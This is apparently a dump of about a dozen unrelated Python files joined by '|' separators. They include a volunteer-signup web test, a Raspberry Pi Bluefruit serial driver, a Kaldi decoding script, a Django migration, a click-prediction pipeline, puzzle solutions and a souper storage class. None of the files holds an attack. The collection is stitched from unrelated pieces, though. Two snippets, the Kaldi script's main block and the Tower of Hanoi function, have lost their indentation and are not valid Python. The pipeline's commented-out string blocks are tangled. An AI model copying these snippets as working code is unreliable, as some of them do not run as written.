    scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=100)
    scenario.add_need(
        name="Begleiter", number=NumericRange(1, 4), accept_signups=True)
    scenario.add_attendee(name="Dustin")
    scenario.add_booking(
        username='admin@example.org',
        occasion=scenario.occasions[0],
        state='accepted',
        cost=100
    )
    scenario.commit()
    scenario.refresh()
    # initially, the volunteer feature is disabled
    browser.visit('/')
    assert not browser.is_text_present('Helfen')
    # once activated, it is public
    browser.login_admin()
    browser.visit('/feriennet-settings')
    browser.fill_form({
        'volunteers': 'enabled',
        'tos_url': 'https://example.org/tos'
    })
    browser.find_by_value("Absenden").click()
    browser.visit('/')
    assert browser.is_text_present('Helfen')
    # users can sign up as volunteers
    browser.links.find_by_text("Helfen").click()
    assert browser.is_text_present("Begleiter")
    assert not browser.is_element_present_by_css('.volunteer-cart-item')
    browser.links.find_by_partial_text("Zu meiner Liste").click()
    assert browser.is_element_present_by_css('.volunteer-cart-item')
    browser.links.find_by_text("Als Hilfsperson registrieren").click()
    browser.fill_form({
        'first_name': "Foo",
        'last_name': "Bar",
        'birth_date': '06.04.1984',
        'address': 'Foostreet 1',
        'zip_code': '1234',
        'place': 'Bartown',
        'email': 'foo@bar.org',
        'phone': '1234'
    })
    browser.find_by_value("Absenden").click()
    # the volunteer is not in the helpers list yet
    browser.visit('/attendees/zoo')
    assert not browser.is_text_present("Foo")
    # the admin can see the signed-up users
    browser.visit(f'/volunteers/{scenario.latest_period.id.hex}')
    assert browser.is_text_present("Foo")
    # verify initial volunteer state
    assert browser.is_text_present("Offen")
    browser.find_by_css('.actions-button').first.click()
    # move volunteer through different volunteer states
    if to_volunteer_state == 'Offen':
        pass
    elif to_volunteer_state == 'Kontaktiert':
        assert not browser.is_text_present("Bestätigt")
        browser.links.find_by_partial_text("Als kontaktiert markieren").click()
        assert browser.is_text_present("Kontaktiert")
    elif to_volunteer_state == 'Bestätigt':
        assert not browser.is_text_present("Bestätigt")
        browser.links.find_by_partial_text("Als bestätigt markieren").click()
        assert browser.is_text_present("Bestätigt")
        # now the volunteer is in the list
        browser.visit('/attendees/zoo')
        assert browser.is_text_present("Foo")
    else:
        # invalid case
        raise AssertionError()
    browser.visit('/export/helfer')
    browser.fill_form({
        'period': scenario.periods[0].id.hex,
        'file_format': "json",
    })
    browser.find_by_value("Absenden").click()
    volunteer_export = json.loads(browser.find_by_tag('pre').text)[0]
    # expected occasion window: offset day 10, localized to Europe/Zurich
    occasion_date = as_datetime(scenario.date_offset(10))
    occasion_date = replace_timezone(occasion_date, 'Europe/Zurich')
    start_time = occasion_date.isoformat()
    end_time = (occasion_date + timedelta(hours=1)).isoformat()

    def get_number_of_confirmed_volunteers(state):
        # only the 'Bestätigt' path confirms the volunteer
        if state == 'Bestätigt':
            return 1
        return 0
    volunteer_json = {
        'Angebot Titel': 'Zoo',
        'Durchführung Daten': [
            [start_time, end_time]
        ],
        'Durchführung Abgesagt': False,
        'Bedarf Name': 'Begleiter',
        'Bedarf Anzahl': '1 - 3',
        'Bestätigte Helfer': get_number_of_confirmed_volunteers(
            to_volunteer_state),
        'Helfer Status': to_volunteer_state,
        'Vorname': 'Foo',
        'Nachname': 'Bar',
        'Geburtsdatum': '1984-06-04',
        'Organisation': '',
        'Ort': 'Bartown',
        'E-Mail': 'foo@bar.org',
        'Telefon': '1234',
        'Adresse': 'Foostreet 1'
    }
    assert volunteer_export == volunteer_json
|
import RPi.GPIO as GPIO
import serial
from time import sleep
import signal
import struct
def sigterm_handler(signal,frame):
    # SIGINT/SIGTERM handler: release the GPIO pins before exiting so a
    # rerun does not find them still claimed.
    GPIO.cleanup()
    print("cleaning up gpio from signal handler")
    exit(0)
signal.signal(signal.SIGINT, sigterm_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
# Bluefruit MODE pin levels: HIGH = command mode, LOW = data mode
BLUEFRUIT_MODE_COMMAND = 1
BLUEFRUIT_MODE_DATA = 0
# BCM pin numbers (the trailing comments note the board pin numbers)
CTS = 4 #23
RTS = 17 #24
mode_pin = 22
GPIO.setmode(GPIO.BCM)
GPIO.setup(CTS, GPIO.OUT)
GPIO.setup(RTS, GPIO.IN)
GPIO.setup(mode_pin, GPIO.OUT)
GPIO.output(mode_pin,GPIO.HIGH)
# module-level state: serial handle, last reply text, connection flag,
# and the mode the module is believed to be in
ser=0
rxText=""
connect=0
mode = BLUEFRUIT_MODE_COMMAND
def reset():
    """Soft-reset the Bluefruit module with ATZ.

    Tries up to 5 times; if all fail, forces command mode and tries
    another 5 times. Returns True when the module acknowledged the
    reset, False otherwise.
    """
    isOK = False
    for i in range(5):
        isOK = sendCommandCheckOK("ATZ")
        if isOK:
            break
        sleep(.05)
    if not isOK:
        # maybe we were stuck in data mode: force command mode and retry
        setMode(BLUEFRUIT_MODE_COMMAND)
        sleep(.05)
        for i in range(5):
            isOK = sendCommandCheckOK("ATZ")
            if isOK:
                break
        if not isOK:
            return False
    # Bluefruit needs 1 second to reboot.
    # Bug fix: the original slept only 1 ms (sleep(.001)), contradicting
    # its own comment and risking commands sent to a rebooting module.
    sleep(1)
    flush()
    return isOK
def factoryReset():
    """Send AT+FACTORYRESET and wait for the OK/ERROR reply.

    Returns True on OK, False on ERROR/timeout. The module reboots
    after a factory reset.
    """
    println("AT+FACTORYRESET")
    isOK = waitForOK()
    # Bluefruit needs 1 second to reboot.
    # Bug fix: the original slept only 1 ms (sleep(.001)), contradicting
    # its own comment.
    sleep(1)
    flush()
    return isOK
def waitForOK():
    #return T/F
    # Polls readLine() until the status word "OK" (True) or "ERROR"
    # (False) arrives, giving up after 500 iterations.
    # Side effects: a 4-line reply carries a payload on line 1 — "0"/"1"
    # updates the global `connect` flag, anything else is kept in
    # `rxText`. The status word is the second-to-last line of the reply.
    global connect,rxText
    counter=0
    while(1):
        ret = readLine()
        if(ret):
            ret=ret.split("\n")
            if(len(ret)==4):
                if(ret[1]=="0\r" or ret[1]=="1\r"):
                    connect=int(ret[1].rstrip("\r"))
                else:
                    rxText=ret[1].rstrip("\r")
            # reduce the reply to its status line for the checks below
            ret=ret[len(ret)-2]+"\n"
        counter+=1
        if(ret=="OK\r\n"):
            return True
        if(ret=="ERROR\r\n" or counter == 500):
            return False
def isConnected():
    #return T/F
    # Actually returns the integer connection state (0/1) parsed from the
    # AT+GAPGETCONN reply — see sendCommandWithIntReply.
    return sendCommandWithIntReply("AT+GAPGETCONN")
def disconnect():
    # Drop the current BLE connection; the OK/ERROR result is ignored.
    sendCommandCheckOK("AT+GAPDISCONNECT")
def sendCommandCheckOK(cmd):
    """Send *cmd* in command mode and return True iff the module said OK.

    If the module is currently in data mode it is switched to command
    mode for the exchange and switched back afterwards.
    """
    global mode
    previous_mode = mode
    in_data_mode = previous_mode == BLUEFRUIT_MODE_DATA
    if in_data_mode:
        setMode(BLUEFRUIT_MODE_COMMAND)
    println(cmd)
    ok = waitForOK()
    if in_data_mode:
        setMode(BLUEFRUIT_MODE_DATA)
    return ok
def sendCommandWithIntReply(cmd):
    #return T/F or num??
    # Sends *cmd* and returns the integer payload of the reply.
    # NOTE(review): waitForOK()'s boolean is deliberately discarded — the
    # reply value is the module-level `connect`, which waitForOK() updates
    # as a side effect while parsing the response.
    current_mode = mode;
    if(current_mode == BLUEFRUIT_MODE_DATA):
        setMode(BLUEFRUIT_MODE_COMMAND)
    println(cmd)
    result = waitForOK()
    result = connect;
    if(current_mode == BLUEFRUIT_MODE_DATA):
        setMode(BLUEFRUIT_MODE_DATA)
    return result
def readLine():
    # Drain the serial input in chunks of up to 100 bytes while data is
    # available and return the LAST decoded chunk (earlier chunks are
    # overwritten). A chunk that fails UTF-8 decoding is discarded and
    # reading continues. Returns None when nothing decodable arrived.
    c=None
    while(available()>0):
        try:
            c=ser.read(100)
            c=c.decode('utf-8')
        except UnicodeDecodeError:
            c=None
            continue
    return c
def begin():
    # Open the UART to the Bluefruit (9600 baud, 250 ms read timeout,
    # hardware flow control), raise CTS, then soft-reset the module.
    # Returns the result of reset().
    global ser, CTS
    ser = serial.Serial('/dev/ttyAMA0',9600,timeout=.250,rtscts=1)
    GPIO.output(CTS,GPIO.HIGH)
    return reset()
def end():
    # Close the serial port opened by begin().
    global ser
    ser.close()
def setMode(new_mode):
    """Switch the Bluefruit between COMMAND (1) and DATA (0) mode via the
    MODE pin and record the new state. Returns True.

    Bug fix: the original drove the pin but never updated the module-level
    `mode` variable, so sendCommandCheckOK / sendCommandWithIntReply —
    which branch on `mode` — always believed the module was still in the
    initial command mode and skipped their mode switching.
    """
    global mode
    GPIO.output(mode_pin, new_mode)
    # give the module a moment to register the pin change
    sleep(.001)
    mode = new_mode
    return True
def write(c):
    # Send one string/character, honouring hardware flow control: busy-wait
    # while the module holds RTS high, pause 50 µs, then write UTF-8 bytes.
    global ser, RTS
    while(GPIO.input(RTS)):
        sleep(.001)
    sleep(50/1000000.0)
    ser.write(c.encode('utf-8'))
def available():
    # Number of bytes waiting in the serial input buffer. When the buffer
    # is empty, pulse CTS low for ~1 ms to invite the module to transmit
    # anything it has pending, then re-check.
    global ser
    if(ser.inWaiting()<1):
        GPIO.output(CTS,GPIO.LOW)
        sleep(.001)
        GPIO.output(CTS,GPIO.HIGH)
    return ser.inWaiting()
def read():
    # Read a single byte (blocking up to the port's 250 ms timeout).
    global ser
    return ser.read()
def flush():
    # Flush the serial output buffer.
    global ser
    ser.flush()
def println(cmd):
    """Send *cmd* followed by CRLF, one character per write() call so the
    RTS flow-control wait in write() runs for every byte."""
    for ch in cmd + "\r\n":
        write(ch)
|
import argparse
import time
from pathlib import Path
import numpy as np
import pydng
from datasets import Dataset
from kaldi import Kaldi
from select_models import select_model
BASE_DIR = Path.home().joinpath('dompteur')
def main(models, experiments, dataset_dir, phi, low, high):
    """Decode a dataset with the model selected by (phi, low, high) and
    print the overall WER plus per-utterance REF/HYP/WER lines.

    models: directory holding the trained models.
    experiments: base output dir; a dated, randomly-named run dir is created.
    dataset_dir: path to the dataset to decode.
    phi, low, high: model-selection parameters (passed as strings; the
        argparse defaults use the literal string "None" — presumably the
        unset sentinel handled inside select_model).
    """
    # create kaldi instance
    model_dir = select_model(models, phi, low, high)
    kaldi = Kaldi.from_trained_model(model_dir=model_dir,
        base_dir=experiments.joinpath(f'{time.strftime("%Y-%m-%d")}_{pydng.generate_name()}'))
    # prepare dataset: dump it in Kaldi's expected layout under the run dir
    dataset = Dataset(dataset_dir)
    kaldi_dataset_dir = kaldi.base_dir.joinpath("data", dataset.name)
    dataset.dump_as_kaldi_dataset(kaldi_dataset_dir, wavs_prefix=f'data/{dataset.name}')
    # decode
    wer, meta = kaldi.decode_wavs(data_dir=dataset.data_dir, text=dataset.text)
    print(f'\n[+] WER {dataset}: {wer:03.2f}%')
    for utt in meta:
        print(f"\n[+] {utt['wav_name']}")
        print(f" REF: {utt['ref']}")
        print(f" HYP: {utt['hyp']}")
        print(f" WER: {utt['wer']*100:5.2f}%")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--models', type=Path, default=BASE_DIR.joinpath('models'),
help='Directory with trained models.')
parser.add_argument('--experiments', type=Path, default=BASE_DIR.joinpath('experiments'),
help='Output directory for experiments.')
parser.add_argument('--dataset_dir', type=Path, default=BASE_DIR.joinpath('datasets', 'speech_10'),
help='Path to dataset.')
parser.add_argument('--phi', default="None",
help='Scaling factor for the psychoacoustic filter.')
parser.add_argument('--low', default="None",
help='Lower cut-off frequency of band-pass filter.')
parser.add_argument('--high', default="None",
help='Higher cut-off frequency of band-pass filter.')
Kaldi.build_container(BASE_DIR)
main(**vars(parser.parse_args()))
|
# Generated by Django 3.0.8 on 2020-07-16 14:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Creates the `message` table: auto PK, text content, auto-updated
    timestamp, and sender/recipient FKs to profiles.User (CASCADE)."""

    initial = True

    dependencies = [
        ('profiles', '0007_guides_quotedcharges'),
    ]

    operations = [
        migrations.CreateModel(
            name='message',
            fields=[
                ('messagesID', models.AutoField(primary_key=True, serialize=False)),
                ('content', models.TextField()),
                # auto_now: refreshed on every save, not only on creation
                ('sendAt', models.DateTimeField(auto_now=True)),
                ('recipientID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='messageRecipient', related_query_name='messageRecipient', to='profiles.User')),
                ('senderID', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='messageSender', related_query_name='messageSender', to='profiles.User')),
            ],
        ),
    ]
|
import common_vars as c_vars
import pandas as pd
import numpy as np
from datetime import datetime
from scipy import sparse
import pickle
import bisect
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import StandardScaler
from imblearn.over_sampling import SMOTE
from sklearn.feature_selection import chi2
from sklearn.ensemble import RandomForestClassifier
np.random.seed(42)
# 'siteid', 'offerid', 'category', 'merchant', 'countrycode', 'browserid', 'devid'
# df = pd.read_csv(c_vars.train_file)
print(str(datetime.now()) + ' Reading Data')
# df = pd.read_csv(c_vars.train_split_train_sample, nrows = 10000)
df = pd.read_csv(c_vars.train_split_train)
print(str(datetime.now()) + ' Reading Data Complete')
# df = df[c_vars.header_useful]
df.fillna(c_vars.fillna_dict, inplace = True)
# for col in df.columns.values:
#     print (col)
#     print (df[col].unique())
# print (df.dtypes)
# df['datetime'] = df['datetime'].apply(lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S"))
# Derive day-of-week (day%7), hour, and a bucketed hour feature from the
# timestamp, then drop the raw datetime column.
df['datetime'] = df['datetime'].apply(lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S"))
df['datetime_day'] = df['datetime'].apply(lambda x: x.day%7)
df['datetime_hour'] = df['datetime'].apply(lambda x: x.hour)
df['datetime_hour_map'] = df['datetime_hour'].apply(lambda x: c_vars.hour_mapping[x])
df = df.drop('datetime', axis=1)
for col in ['merchant', 'siteid', 'offerid', 'category']:
    df[col] = df[col].astype(np.int64)
# df.loc[:, 'browserid'] = df['browserid'].apply(lambda x: x if x not in c_vars.browserid_map
#                                                else c_vars.browserid_map[x])
# merchant, siteid, offerid, category
# Per-column click statistics: for each categorical column compute
# count / num_0 / num_1 / click_rate per value and merge them back onto df.
# High-cardinality columns get their long tail (values past the cumulative
# count threshold) collapsed into a single -99999 bucket.
df_feature = {}
for col in ['merchant', 'siteid', 'offerid', 'category', 'countrycode', 'browserid', 'devid', 'datetime_hour', 'datetime_day']:
# for col in ['merchant']:
    df_temp = df[[col, 'click']]
    df_temp = df_temp.groupby([col]).agg(['count', np.sum])
    df_temp.reset_index(inplace = True)
    df_temp['count'] = df_temp['click', 'count']
    df_temp['num_1'] = df_temp['click', 'sum']
    df_temp['num_0'] = df_temp['count'] - df_temp['num_1']
    df_temp = df_temp[[col, 'count', 'num_0', 'num_1']]
    df_temp.columns = df_temp.columns.get_level_values(0)
    df_temp.sort_values('count', inplace = True, axis = 0, ascending = False)
    df_temp['cumul_sum'] = np.cumsum(df_temp['count'])
    if col in ['merchant', 'siteid', 'offerid', 'category']:
        # collapse the rare tail into the -99999 fallback bucket
        df_temp_2 = df_temp.loc[df_temp['cumul_sum'] > c_vars.threshold_dict[col] * len(df), :]
        df_temp = df_temp.loc[~(df_temp['cumul_sum'] > c_vars.threshold_dict[col] * len(df)), :]
        df_temp = df_temp.append({col:-99999,
                                  'count':np.sum(df_temp_2['count']),
                                  'num_0':np.sum(df_temp_2['num_0']),
                                  'num_1':np.sum(df_temp_2['num_1'])},
                                 ignore_index = True)
    df_temp['click_rate'] = df_temp['num_1']/df_temp['count']
    df_temp.drop(['cumul_sum'], inplace = True, axis = 1)
    df_feature[col] = df_temp.loc[:,:]
    df = pd.merge(df, df_temp, how = 'left', on = col, suffixes = ('', ''))
    df.rename(columns = {'count':col+'_count', 'num_0':col+'_num_0',
                         'num_1':col+'_num_1', 'click_rate':col+'_click_rate'},
              inplace = True)
    if col in ['merchant', 'siteid', 'offerid', 'category']:
        # rows whose value fell in the collapsed tail get the bucket's stats
        for field in ['count', 'num_0', 'num_1', 'click_rate']:
            df[col + '_' + field].fillna(df_feature[col].loc[df_temp[col] == -99999, field].values[0], inplace = True)
# print (df.columns.values)
# Same statistics for selected column *pairs* (interaction features),
# with the tail collapsed into a (-999999, -999999) bucket when the pair
# has an entry in threshold_dict.
for col1, col2 in [['countrycode', x] for x in ['merchant', 'siteid', 'offerid', 'category', 'datetime_hour_map']] +\
                  [['siteid', x] for x in ['merchant', 'offerid', 'category']]:
    col = col1 + '_' + col2
    df_temp = df[[col1, col2, 'click']]
    df_temp = df_temp.groupby([col1, col2]).agg(['count', np.sum])
    df_temp.reset_index(inplace = True)
    df_temp['count'] = df_temp['click', 'count']
    df_temp['num_1'] = df_temp['click', 'sum']
    df_temp['num_0'] = df_temp['count'] - df_temp['num_1']
    df_temp = df_temp[[col1, col2, 'count', 'num_0', 'num_1']]
    df_temp.columns = df_temp.columns.get_level_values(0)
    df_temp.sort_values('count', inplace = True, axis = 0, ascending = False)
    df_temp['cumul_sum'] = np.cumsum(df_temp['count'])
    if col in c_vars.threshold_dict:
        df_temp_2 = df_temp.loc[df_temp['cumul_sum'] > c_vars.threshold_dict[col] * len(df), :]
        df_temp = df_temp.loc[~(df_temp['cumul_sum'] > c_vars.threshold_dict[col] * len(df)), :]
        df_temp = df_temp.append({col1:-999999, col2:-999999,
                                  'count':np.sum(df_temp_2['count']),
                                  'num_0':np.sum(df_temp_2['num_0']),
                                  'num_1':np.sum(df_temp_2['num_1'])},
                                 ignore_index = True)
    df_temp['click_rate'] = df_temp['num_1']/df_temp['count']
    df_temp.drop(['cumul_sum'], inplace = True, axis = 1)
    df_feature[col] = df_temp.loc[:,:]
    df = pd.merge(df, df_temp, how = 'left', on = [col1, col2], suffixes = ('', ''))
    df.rename(columns = {'count':col+'_count', 'num_0':col+'_num_0',
                         'num_1':col+'_num_1', 'click_rate':col+'_click_rate'},
              inplace = True)
    if col in c_vars.threshold_dict:
        for field in ['count', 'num_0', 'num_1', 'click_rate']:
            df[col + '_' + field].fillna(df_feature[col].loc[(df_temp[col1] == -999999) & (df_temp[col2] == -999999),
                                                             field].values[0], inplace = True)
# print (df)
# print (df)
print (df.columns.values)
# quick null/dtype audit of every column
for col in df.columns.tolist():
    print (col, np.sum(df[col].isnull()), df[col].dtype)
# rebuild the model feature list: drop raw/id columns, add derived ones
for col in ['datetime', 'click', 'merchant', 'siteid', 'offerid', 'category']:
# for col in ['datetime', 'click']:
    c_vars.header_useful.remove(col)
c_vars.header_useful.append('datetime_day')
c_vars.header_useful.append('datetime_hour')
for col in ['merchant', 'siteid', 'offerid', 'category', 'countrycode', 'browserid', 'devid', 'datetime_hour', 'datetime_day'] +\
           ['countrycode_' + str(x) for x in ['merchant', 'siteid', 'offerid', 'category', 'datetime_hour_map']] +\
           ['siteid_' + str(x) for x in ['merchant', 'offerid', 'category']]:
    for field in ['count', 'num_0', 'num_1', 'click_rate']:
        c_vars.header_useful.append(col + '_' + field)
print (c_vars.header_useful)
# persist the per-value statistics for use at prediction time
with open('../analysis_graphs/df_feature', 'wb') as f:
    pickle.dump(df_feature, f)
del df_feature
X = df[c_vars.header_useful].as_matrix()
y = df['click'].as_matrix()
print (str(datetime.now()) + ' Label Encoding Started')
# label_encoder = [LabelEncoder() for _ in range(3)]
# the first 9 feature columns are categorical and get label-encoded
label_encoder = [LabelEncoder() for _ in range(9)]
for i in range(len(label_encoder)):
    label_encoder[i].fit(X[:,i])
    # print (i, c_vars.header_useful[i], label_encoder[i].get_params(deep=True))
    X[:,i] = label_encoder[i].transform(X[:,i])
print (str(datetime.now()) + ' Label Encoding Completed')
del df
X = X.astype(np.float64)
print (str(datetime.now()) + ' Standard Scaler Started')
standard_scaler = StandardScaler()
standard_scaler.fit(X)
# X_ohe = ohe.transform(X[:,[0,1,2,3,4]])
print (str(datetime.now()) + ' Standard Scaler Completed')
# NOTE: the triple-quoted blocks below are dead code kept as string
# literals (disabled OHE / SMOTE / chi2 / RandomForest experiments).
'''
print (str(datetime.now()) + ' OHE Started')
ohe = OneHotEncoder(sparse = False)
ohe.fit(X[:,[0,1,2,3,4]])
# X_ohe = ohe.transform(X[:,[0,1,2,3,4]])
print (str(datetime.now()) + ' OHE Completed')
'''
# X = X[:,[i for i in range(len(c_vars.header_useful)) if i not in [0,1,2,3,4,5]]]
# X = np.hstack((X, X_ohe))
# X = standard_scaler.transform(X)
# print (X)
# print (np.mean(X, axis = 0))
# print (np.var(X, axis = 0))
'''
'''
# save the label encoder and the one hot encoding to disk
with open('../analysis_graphs/label_encoder', 'wb') as f:
    pickle.dump(label_encoder, f)
with open('../analysis_graphs/standard_scaler', 'wb') as f:
    pickle.dump(standard_scaler, f)
# with open('../analysis_graphs/ohe', 'wb') as f:
#     pickle.dump(ohe, f)
'''
print (X.shape, y.shape, np.sum(y))
sm = SMOTE(random_state=42)
X, y = sm.fit_sample(X, y)
print (X.shape, y.shape, np.sum(y))
chi2_values, p_values = chi2(X, y)
print ('chi square values')
print (chi2_values)
print ('p values')
print (p_values)
clf = RandomForestClassifier(n_estimators = 200, max_depth = 10, min_samples_leaf = 100,
random_state = 42, verbose = 2)
clf.fit(X, y)
print (clf.feature_importances_)
# feature_importances_
'''
|
def toh(s, d, e, n):
if n <= 0:
print("return from toh({}, {}, {}, {})".format(s, d, e, n))
return
#print("calling toh({}, {}, {}, {} -1)".format(s, e, d, n))
toh(s, e, d, n-1)
#print("after toh({}, {}, {}, {})".format(s, d, e, n))
print("move {} to {} disc {}".format(s, d, n))
#print("calling toh({}, {}, {}, {} -1)".format(e, d, s, n))
toh(e, d, s, n-1)
toh("s", "d", "e", 3) |
#!/usr/bin/env python
"""
_GetAvailableFilesByLimit_
Oracle implementation of Subscription.GetAvailableFilesByLimit
"""
from WMCore.WMBS.Oracle.Subscriptions.GetAvailableFiles import GetAvailableFiles as GetAvailableFilesOracle
class GetAvailableFilesByLimit(GetAvailableFilesOracle):
    """Oracle variant of Subscription.GetAvailableFiles capped at ``limit`` rows."""

    def execute(self, subscription, limit, conn = None, transaction = False):
        """Fetch at most ``limit`` available files for ``subscription``.

        BUG FIX: the original rebound ``self.sql`` to the ROWNUM-wrapped
        query on every call, so a second ``execute`` wrapped the already
        wrapped SQL (the subquery nesting grew with each call). Build the
        wrapped query in a local variable and leave ``self.sql`` untouched.
        """
        sql = "SELECT * FROM (" + self.sql + ") WHERE rownum <= :maxLimit"
        results = self.dbi.processData(sql, {"subscription": subscription,
                                             "maxLimit": limit},
                                       conn = conn, transaction = transaction)
        return self.formatDict(results)
|
# Simple console age gate: ask for the visitor's identity and check legal age.
Nom = input("Entrer votre nom :")
Prenom = input("Entrer votre prenom :")
Age = input("Entrer votre âge :")
# BUG FIX: the original compared strings (`Age < str(18)`), which is
# lexicographic -- e.g. "9" < "18" is False -- so minors typing a single
# digit were let in. Convert to int for a numeric comparison.
if int(Age) < 18:
    print("Désolé " + Prenom + " " + Nom + " mais vous n'avez pas l'âge requis pour "
          + "entrer sur ce site ^^")
else:
    print("Bienvenue " + Prenom + " " + Nom)
|
# ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Script for generating the PB file for Spearmint:
- Go through the hyper-yaml
- extract lines that specify a !hyperopt range
- format and dump an entry into the protobuf
"""
import os
import logging
logger = logging.getLogger(__name__)
def write_pb(input_file, pb_file):
    """Scan a hyperyaml file and emit a Spearmint protobuf config.

    Every line tagged with ``!hyperopt`` becomes one ``variable`` block in
    ``pb_file``. Returns True when at least one tagged line was found.
    """
    script_name = 'neon.hyperopt.gen_yaml_and_run'  # script spearmint calls
    found_any = False
    with open(input_file, 'r') as fin:
        with open(pb_file, 'w') as fout:
            # Protobuf header naming the script Spearmint should invoke.
            fout.write('language: PYTHON \nname: "' + script_name + '"\n\n')
            for inline in fin:
                if '!hyperopt' not in inline:
                    continue
                fout.write(write_block(parse_line(inline)))
                found_any = True
    return found_any
def parse_line(line):
    """Parse one ``!hyperopt`` hyperyaml line into a dict.

    Returns a dict with ``name`` and ``type`` plus either ``start``/``end``
    (FLOAT, INT) or ``string`` (ENUM). Raises AttributeError for any other
    type token.
    """
    tokens = [tok.strip("{},") for tok in line.split()]
    # Everything of interest follows the '!hyperopt' marker token.
    pos = 0
    while tokens[pos] != '!hyperopt':
        pos += 1
    ho_dict = {'name': tokens[pos + 1], 'type': tokens[pos + 2]}
    kind = ho_dict['type']
    if kind == 'FLOAT':
        ho_dict['start'] = float(tokens[pos + 3])
        ho_dict['end'] = float(tokens[pos + 4])
    elif kind == 'INT':
        ho_dict['start'] = int(tokens[pos + 3])
        ho_dict['end'] = int(tokens[pos + 4])
    elif kind == 'ENUM':
        # todo: Spearmint supports ENUM but we are not handling it yet.
        ho_dict['string'] = tokens[pos + 3]
    else:
        raise AttributeError("Supported types are FLOAT, INT, ENUM")
    return ho_dict
def write_block(ho_dict):
    """Render one Spearmint protobuf ``variable`` block from a parsed
    hyperopt entry (the dict produced by parse_line).

    Raises NotImplementedError for ENUM and AttributeError for any other
    unrecognised type.
    """
    # The triple-quoted literal below is whitespace-sensitive protobuf text;
    # do not reformat it.
    if ho_dict['type'] in ('FLOAT', 'INT'):
        outline = """variable {
name: \""""+ho_dict['name']+"""\"
type: """+ho_dict['type']+"""
size: 1
min: """+str(ho_dict['start'])+"""
max: """+str(ho_dict['end'])+"""
}\n\n"""
        return outline
    elif ho_dict['type'] == 'ENUM':
        raise NotImplementedError("ENUM parameters currently not supported")
    else:
        raise AttributeError("hyperparameter type not understood")
def main(hyperopt_dir):
    """Entry point: read ``hyperyaml.yaml`` inside ``hyperopt_dir`` and write
    the Spearmint config ``spear_config.pb`` next to it.

    Raises AttributeError when the yaml contains no hyperopt ranges.
    """
    in_file = os.path.join(hyperopt_dir, 'hyperyaml.yaml')
    pb_file = os.path.join(hyperopt_dir, 'spear_config.pb')
    if not write_pb(in_file, pb_file):
        raise AttributeError("No hyperopt ranges found in yaml.")
    print("Hyperparamter ranges written from %s to %s"
          % (in_file, pb_file))
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
import re

# Print the first alphanumeric character that repeats consecutively in the
# input line, or -1 when no such run exists.
text = input()
match = re.search(r"([a-zA-Z0-9])\1+", text)
print(match.group(1) if match else "-1")
|
def solution(index):
    """Digit at position ``index`` of the infinite stream 0123456789101112...

    Returns -1 for a negative index.
    """
    if index < 0:
        return -1
    digits = 1
    while True:
        # Size of the current block: 10 numbers for the first block (it
        # includes 0-9), 9 * 10**(digits-1) for every later block.
        count = 10 if digits == 1 else 9 * pow(10, digits - 1)
        span = count * digits
        if index < span:
            return digit_at_index2(index, digits)
        index -= span
        digits += 1


def digit_at_index(index, digits):
    """String-based variant: digit at offset ``index`` inside the block of
    ``digits``-digit numbers (kept as a cross-check for digit_at_index2)."""
    number = begin_number(digits) + index // digits
    return str(number)[index % digits]


def digit_at_index2(index, digits):
    """Arithmetic variant of digit_at_index (no string conversion)."""
    number = index // digits + begin_number(digits)
    # Drop the digits to the right of the wanted one, then take it mod 10.
    for _ in range(digits - index % digits - 1):
        number //= 10
    return number % 10


def begin_number(digits):
    """Smallest number in the ``digits``-digit block (0 for the first)."""
    return 0 if digits == 1 else pow(10, digits - 1)


print(solution(1001))
|
from zope.interface import implements, alsoProvides, Interface
from zope.component import getMultiAdapter, provideUtility, provideAdapter
from souper.interfaces import ICatalogFactory
from souper.soup import get_soup, Record, NodeAttributeIndexer
from repoze.catalog.indexes.field import CatalogFieldIndex
from repoze.catalog.indexes.text import CatalogTextIndex
from repoze.catalog.indexes.keyword import CatalogKeywordIndex
try:
from souper.plone.interfaces import ISoupRoot
from souper.plone.locator import StorageLocator
except ImportError:
from .interfaces import ISoupRoot
from .locator import StorageLocator
provideAdapter(StorageLocator, adapts=[Interface])
from rapido.core.interfaces import IStorage, IRapidoApplication
from .catalog import CatalogFactory
from .interfaces import IRecord
class SoupStorage(object):
    """souper-backed implementation of the rapido ``IStorage`` contract.

    Records live in a souper "soup" stored on ``context.root`` and are
    indexed through a repoze.catalog; one CatalogFactory utility is
    registered per storage id so the catalog can be (re)built.
    """
    implements(IStorage)

    def __init__(self, context):
        self.context = context
        self.id = context.id
        self.root = self.context.root
        # Register the catalog factory under this storage's id; souper
        # looks it up by name when building the soup's catalog.
        provideUtility(CatalogFactory(), ICatalogFactory, name=self.id)
        self._soup = get_soup(self.id, self.root)

    def initialize(self):
        """ setup the storage
        """
        # Mark the root so souper's locator accepts it, make sure the
        # storage exists, then re-fetch the soup.
        alsoProvides(self.root, ISoupRoot)
        locator = StorageLocator(self.root)
        locator.storage(self.id)
        self._soup = get_soup(self.id, self.root)

    @property
    def soup(self):
        # Raw souper soup (records + catalog).
        return self._soup

    def create(self):
        """ return a new record
        """
        record = Record()
        rid = self.soup.add(record)
        # Wrap the stored record in the IRecord multi-adapter used by rapido.
        return getMultiAdapter(
            (self.soup.get(rid), IRapidoApplication(self.context)),
            IRecord)

    def get(self, uid=None):
        """ return an existing record
        """
        try:
            record = self.soup.get(uid)
        except KeyError:
            # Unknown uid: callers expect None rather than an exception.
            return None
        return getMultiAdapter(
            (record, IRapidoApplication(self.context)),
            IRecord)

    def delete(self, record):
        """ delete a record
        """
        # record.context is the underlying souper record.
        del self.soup[record.context]

